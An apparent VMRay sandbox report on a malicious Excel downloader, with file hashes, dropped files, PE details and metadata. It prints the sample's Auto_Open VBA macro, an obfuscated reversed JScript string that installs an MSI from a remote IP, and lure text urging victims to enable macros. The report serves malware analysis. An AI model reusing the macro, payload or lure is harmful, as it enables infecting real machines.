Malicious
Classifications

Downloader Dropper

Threat Names

VB:Trojan.Valyria.5362 Trojan.Zmutzy.Hory.1

Dynamic Analysis Report

Created on 2021-10-01T14:48:00

f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2.xls

Excel Document

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "12 minutes" to "30 seconds" to reveal dormant functionality.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2.xls Sample File Excel Document
malicious
MIME Type application/vnd.ms-excel
File Size 270.00 KB
MD5 96417179582f29ed95c5719e60203d61
SHA1 5e7781903f5a0c67318db9edccc60e5c8071a73e
SHA256 f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2
SSDeep 6144:2cKoSsxzNDZL2Qiw+4868O8K/5Le+k3hbdlylKsgqopeJBWhZFVE+W2NdA9ZFfsh:r0IJIQJJ6MuDQIG7E6Sr
ImpHash -
AV Matches (1)
Threat Name Verdict
VB:Trojan.Valyria.5362
malicious
Office Information
Subject JScript
Description eval('})"28.831.612.59//:ptth"(tcudorPllatsnI;2=leveLIU{))"rellatsnI.rellatsnIswodniW"(tcejbOXevitcA wen(htiw'.split('').reverse().join(''))
Creator Ferop
Last Modified By Administrator
Create Time 2021-08-17 12:24:08+00:00
Modify Time 2021-10-01 13:01:11+00:00
Codepage ANSI_Latin1
Application Microsoft Excel
App Version 16.0
Document Security NONE
Titles Of Parts Sheet1
scale_crop False
shared_doc False
Controls (1)
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
VBA Macros (1)
Macro #1: Module1
Attribute VB_Name = "Module1"
Function Auto_Open()
    ' Runs automatically when the workbook is opened and macros are enabled.
    Dim a As New ScriptControl
    ' The script engine is taken from the document's Subject property ("JScript" in this sample).
    a.Language = ActiveWorkbook.BuiltinDocumentProperties("Subject").Value
    ' The code handed to that engine is taken from the Comments property
    ' (the reversed eval string listed under Description above), so the
    ' macro body itself contains no payload.
    a.AddCode (ActiveWorkbook.BuiltinDocumentProperties("Comments").Value)
End Function


Extracted Image Texts (1)
Image 1: 0.PNG
This document is protected by the Microsoft 1. Open the document in Microsoft office. Previewing online is not available for protected documents. 2. If this document was downloaded from your email, please click Enable Editing from the yellow bar above. 3. Once you have enabled editing, please click Enable Content from the yellow bar above. Attention! We never ask for any confidential information for decryption! Please be aware!
CFB Streams (15)
Name ID Size Actions
Root\Workbook 1 252.86 KB
Root\_VBA_PROJECT_CUR\VBA\dir 4 709 Bytes
Root\_VBA_PROJECT_CUR\VBA\Sheet1 5 977 Bytes
Root\_VBA_PROJECT_CUR\VBA\Module1 6 1.24 KB
Root\_VBA_PROJECT_CUR\VBA\__SRP_0 7 1.27 KB
Root\_VBA_PROJECT_CUR\VBA\__SRP_1 8 74 Bytes
Root\_VBA_PROJECT_CUR\VBA\__SRP_2 9 84 Bytes
Root\_VBA_PROJECT_CUR\VBA\__SRP_3 10 103 Bytes
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook 11 985 Bytes
Root\_VBA_PROJECT_CUR\VBA\_VBA_PROJECT 12 2.88 KB
Root\_VBA_PROJECT_CUR\PROJECT 13 479 Bytes
Root\_VBA_PROJECT_CUR\PROJECTwm 14 86 Bytes
Root\SummaryInformation 15 400 Bytes
Root\DocumentSummaryInformation 16 244 Bytes
Root\CompObj 17 108 Bytes
filter.msi Downloaded File MSI
malicious
Also Known As C:\Windows\Installer\MSI5864.tmp (Downloaded File)
Parent File analysis.pcap
MIME Type application/x-msi
File Size 184.00 KB
MD5 84ec41afdc49c2ee8dff9ba07ba5c9a4
SHA1 cd33ef1a43ad7f20471f876bd24441ee20b475af
SHA256 83e4c90dc8bc1c53a4000bef83a355c4e36d2a1ba4a5d0982bc5b9b350278f1f
SSDeep 3072:hbwvxMbpo9fp9XhyyRi+qsEUr9+KobGJDOoSf8MmMw3gS/8TOC3h8p:hbwvxRxNRi+qsEg+77nHS/Ze8p
ImpHash -
AV Matches (1)
Threat Name Verdict
Trojan.Zmutzy.Hory.1
malicious
C:\ProgramData\Excel\svchost.exe Dropped File Binary
suspicious
Lowered to Suspicious because the artifact is known to be Clean or Trusted.
MIME Type application/vnd.microsoft.portable-executable
File Size 288.00 KB
MD5 6c14b77096d4d6bfbe97f93411103e72
SHA1 af1c6129ef6bbc51b31c6cc64799cc6299047a39
SHA256 e95681e20ab19a50abdacd73c7d9eac9cfec7d949a23b8346b84d8f4bc493ca5
SSDeep 6144:KXvVGqCwiNhEKO/lMiVQTJyCICldgAO9y:IHCwiNhErCluS
ImpHash 7f7ccd5a4f25c1cac7831d174e43cc3d
PE Information
Image Base 0x400000
Entry Point 0x424759
Size Of Code 0x37000
Size Of Initialized Data 0x10000
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2007-10-02 06:00:55+00:00
Version Information (10)
Comments KiXtart 2010 CareWare
CompanyName Ruud van Velsen (Microsoft)
FileDescription KiXtart main executable
FileVersion 4, 60, 0, 0
InternalName KIX32
LegalCopyright Copyright Ruud van Velsen 2007
OriginalFilename KIX32.EXE
ProductName KiXtart 2010
ProductVersion 4.60
SpecialBuild Build 250
Sections (4)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x36546 0x37000 0x1000 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.62
.rdata 0x438000 0xb8ce 0xc000 0x38000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 6.01
.data 0x444000 0x1ef3c 0x3000 0x44000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.32
.rsrc 0x463000 0x80c 0x1000 0x47000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.04
Imports (10)
NETAPI32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
Netbios - 0x43831c 0x424ec 0x424ec 0x108
MPR.dll (6)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
WNetGetUserA - 0x438300 0x424d0 0x424d0 0x3d
WNetUseConnectionA - 0x438304 0x424d4 0x424d4 0x4c
WNetOpenEnumA - 0x438308 0x424d8 0x424d8 0x40
WNetEnumResourceA - 0x43830c 0x424dc 0x424dc 0x1c
WNetCancelConnection2A - 0x438310 0x424e0 0x424e0 0xc
WNetCloseEnum - 0x438314 0x424e4 0x424e4 0x11
WINMM.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
sndPlaySoundA - 0x438414 0x425e4 0x425e4 0x9c
PlaySoundA - 0x438418 0x425e8 0x425e8 0xa
VERSION.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFileVersionInfoSizeA - 0x438404 0x425d4 0x425d4 0x1
GetFileVersionInfoA - 0x438408 0x425d8 0x425d8 0x0
VerQueryValueA - 0x43840c 0x425dc 0x425dc 0xa
KERNEL32.dll (146)
USER32.dll (36)
WINSPOOL.DRV (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
AddPrinterConnectionA - 0x438420 0x425f0 0x425f0 0x11
DeletePrinterConnectionA - 0x438424 0x425f4 0x425f4 0x31
ADVAPI32.dll (44)
ole32.dll (7)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
MkParseDisplayName - 0x43842c 0x425fc 0x425fc 0xcd
BindMoniker - 0x438430 0x42600 0x42600 0x0
CLSIDFromProgID - 0x438434 0x42604 0x42604 0x6
CoCreateInstance - 0x438438 0x42608 0x42608 0x10
OleBuildVersion - 0x43843c 0x4260c 0x4260c 0xd0
OleInitialize - 0x438440 0x42610 0x42610 0xee
CreateBindCtx - 0x438444 0x42614 0x42614 0x76
OLEAUT32.dll (18)
Memory Dumps (2)
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
svchost.exe 4 0x00400000 0x00463FFF Relevant Image False 32-bit 0x004268CC False False
svchost.exe 4 0x00400000 0x00463FFF Process Termination False 32-bit - False False
C:\Config.Msi\MSI76EE.tmp Dropped File Unknown
clean
MIME Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\desktop.ini Dropped File Unknown
clean
Known to be clean.
Also Known As c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\purlac7n\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\nl7ebwmb\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\1f2c20ea\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\wwbelx3i\desktop.ini (Dropped File)
MIME Type application/x-wine-extension-ini
File Size 67 Bytes
MD5 4a3deb274bb5f0212c2419d3d8d08612
SHA1 fa52f823b821155cf0ec527d52ce9b1390ec615e
SHA256 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
SSDeep 3:0NdQDjo8hzUzYcB:0NwosUzxB
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\~df7f5127fbd2e163a7.tmp Dropped File Stream
clean
MIME Type application/octet-stream
File Size 68.00 KB
MD5 fa78853fb23c21cc9881c64bee30b180
SHA1 3a221c3f6a87cd1651d28484ccf1e0f93e2aacff
SHA256 b224d131393fcdad9ee67de310007693e77bc4249f091128848a24f80787e375
SSDeep 24:TWhilRc5+gipV8+gipV7V8nZgNlGisGgSi+R3rVZk/+z:TgilRJgSFgS5GnqluSi+PuS
ImpHash -
C:\ProgramData\Excel\svchost.bin Dropped File Stream
clean
MIME Type application/octet-stream
File Size 1.41 KB
MD5 a176738655f7bd7270aa086db0f35451
SHA1 83396ccc22aa5e5aa3d697f8fba5a5eac3c9b0ae
SHA256 d0d415dbe02e893fb1b2d6112c0f38d8ce65ab3268c896bfc64ba06096d4d09a
SSDeep 24:g38XAfn03kz/Ht/rfVd9mPROB16SpuRz+Ui3q/OZd5VOnxHW5DSuD1ebzZfHHBE:l4n032VJJMl+a/Otmx8DwfdS
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\~df7732985c63e77b30.tmp Dropped File Stream
clean
Known to be clean.
MIME Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep 3::
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\desktop.ini Dropped File Unknown
clean
Known to be clean.
MIME Type application/x-wine-extension-ini
File Size 145 Bytes
MD5 ba96961f5e22882527919e19daea510f
SHA1 e10e8bebbd0573e3a1494ea3f21682f7490c427b
SHA256 dace5ad59099429d8aed4ee279f1263efb65d64456931398465a396cf0e79bd7
SSDeep 3:0NdQDjotjIAXNam+p28jqGiEI7fOLyovZeLhzUzYcB:0NwoyAXNxW28CEI7QyyZeNUzxB
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\index.dat Dropped File Stream
clean
Known to be clean.
Also Known As c:\users\keecfmwgj\appdata\local\temp\cookies\index.dat (Dropped File)
MIME Type application/octet-stream
File Size 16.00 KB
MD5 d7a950fefd60dbaa01df2d85fefb3862
SHA1 15740b197555ba8e162c37a60ba655151e3bebae
SHA256 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
SSDeep 3:qRFiJ2totWIlXllll:qjyx
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat Dropped File Stream
clean
MIME Type application/octet-stream
File Size 16.00 KB
MD5 db08e8582979fd86edd933b68c5bddcb
SHA1 2af472ff383e64ac73102470b255f3f0c0896b73
SHA256 da13a12ec78189db7923748d22a2062d0cf9cf09085ab8c901e78b13b102d5fb
SSDeep 3:qRFiJ2totWIlXllll5llqKZ4IEj+toXl:qjyx4npjqk
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat Dropped File Stream
clean
MIME Type application/octet-stream
File Size 16.00 KB
MD5 7aeb69e984857bb6b1f2a34b5594c092
SHA1 80b911ba5525506db5833318f1c80a75982dfcfb
SHA256 44012e2ab82d942948c4afd0dbee5bb9423f509c67fbe58bd47f693d43632181
SSDeep 3:qRFiJ2totWIlXllMl5llqKZ4IEj+toXl:qjyxk2npjqk
ImpHash -
C:\Windows\Installer\18fe687.ipi Dropped File OLE Compound
clean
MIME Type application/CDFV2
File Size 20.00 KB
MD5 8dbe3854085919ed873b38ce6aae483f
SHA1 80c68e65d1b34d68e0900e289d6d1e05421374b6
SHA256 f509e4070a9c00a8ec654580cd2d62612c7a5f55b29229bb0390d24f820ba967
SSDeep 48:fhsz+XLhluQh8fgS5GnqluSi+P0gSIRKif:fuz+6Qh8YoWOV
ImpHash -
CFB Streams (17)
Name ID Size Actions
Root\䕙䇲䆸㲷䠧 1 76 Bytes
Root\䕙䇲䆸㷷䐤䠨 2 12 Bytes
Root\䒕䒪㾱䈶䠵 3 18 Bytes
Root\䈜䈯䗦䒬䖱 4 36 Bytes
Root\䒏䇯䕨䠶 5 128 Bytes
Root\䕙䓲䕨䌷䖨 6 664 Bytes
Root\䌝䈰䗜䐤㵳䚲 7 20 Bytes
Root\䌝䈰䗜䐤㱳䊬䠫 8 16 Bytes
Root\䄍䄷䄥䈶䄙䋷 9 64 Bytes
Root\䌍䎶䕙䐲䗳 10 0 Bytes -
Root\䌍䎶䈜䌵䏤 11 0 Bytes -
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 12 2 Bytes
Root\䉊䈷㻵䅨䒲䠷 13 0 Bytes -
Root\䕝䑤䄶䗦䒬㷱䐤䠨 14 40 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 15 20 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 16 16 Bytes
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 17 2 Bytes
C:\Windows\Installer\MSI7141.tmp Dropped File Stream
clean
MIME Type application/octet-stream
File Size 1.89 KB
MD5 7d610eefec7ce65bc89d474d86964169
SHA1 2b2b785aec16916225d56e71cba2d1775d2144fa
SHA256 e9405795de191f85662c040052e8d97652d2f896d21d92ac8ee66c55912ee4dd
SSDeep 24:ygey4BFHwVwM2url1fycmGy2TCGZpUFxwZOFP37s9g2Efljaceg4ccSDhiSLuUpd:y5SVEujwuUxwZyP37sq2EflkUD8SZL
ImpHash -
C:\Config.Msi\18fe688.rbs Dropped File Stream
clean
MIME Type application/octet-stream
File Size 1.97 KB
MD5 087f4a1d3f6acb66ce71a9ee75a7ed6b
SHA1 4bad72787acfa5e408a925d69fffc0b0234fbc5e
SHA256 a7e50ee6fb908a5dffaf110e79145e8ed2f5addcd9e0825eec68854422a3fd39
SSDeep 24:Vogey4BFHwVw+63exq/Yziu75BpUQv1nwZrwGw0dnwsZFeV5kFPGO7L7fLDhiSu9:65SV+uxq/Yuu75r/nwZq8P9XTLD8SQ
ImpHash -
C:\Windows\Installer\18fe687.ipi Dropped File OLE Compound
clean
MIME Type application/CDFV2
File Size 20.00 KB
MD5 98b7558e2f84062761ecaa9e1717f47e
SHA1 c4f33fff1ff0c6ab1c2353b4829c3f5303a7c33a
SHA256 865de1c1ef69145af8b000cd513728bb8a82a93247c6fd8aaf29c7f316e89ac8
SSDeep 48:dR0McDHYluKh8fgS5GnqluSi+P0gSIRKif:dRBYKh8YoWOV
ImpHash -
CFB Streams (17)
Name ID Size Actions
Root\䕙䇲䆸㲷䠧 1 0 Bytes -
Root\䕙䇲䆸㷷䐤䠨 2 0 Bytes -
Root\䒕䒪㾱䈶䠵 3 18 Bytes
Root\䈜䈯䗦䒬䖱 4 0 Bytes -
Root\䒏䇯䕨䠶 5 0 Bytes -
Root\䕙䓲䕨䌷䖨 6 0 Bytes -
Root\䌝䈰䗜䐤㵳䚲 7 0 Bytes -
Root\䌝䈰䗜䐤㱳䊬䠫 8 0 Bytes -
Root\䄍䄷䄥䈶䄙䋷 9 0 Bytes -
Root\䌍䎶䕙䐲䗳 10 0 Bytes -
Root\䌍䎶䈜䌵䏤 11 0 Bytes -
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 12 2 Bytes
Root\䉊䈷㻵䅨䒲䠷 13 0 Bytes -
Root\䕝䑤䄶䗦䒬㷱䐤䠨 14 40 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 15 20 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 16 16 Bytes
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 17 2 Bytes
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\version[1].php Downloaded File Stream
clean
Known to be clean.
Parent File analysis.pcap
MIME Type application/octet-stream
File Size 1 Bytes
MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SSDeep 3:V:V
ImpHash -
0.PNG Embedded File Image
clean
Parent File C:\Users\kEecfMwgj\Desktop\f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2.xls
MIME Type image/png
File Size 234.43 KB
MD5 09a30f566b788967041a2f2e4265f398
SHA1 c6a9ac06a18d036ebd8b2a99f42dd8ed9622066e
SHA256 cba5ee9776e575d159d95441b806c1bcc07950e1d25c61c275ad173eed1189a6
SSDeep 6144:psHfsS9Jpu/P+bJOre06MCVDIinIKx1buIsaj2r0Eh:Y04JIoJg6MGDdIK7Ym2rL
ImpHash -
Function Logfile
This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.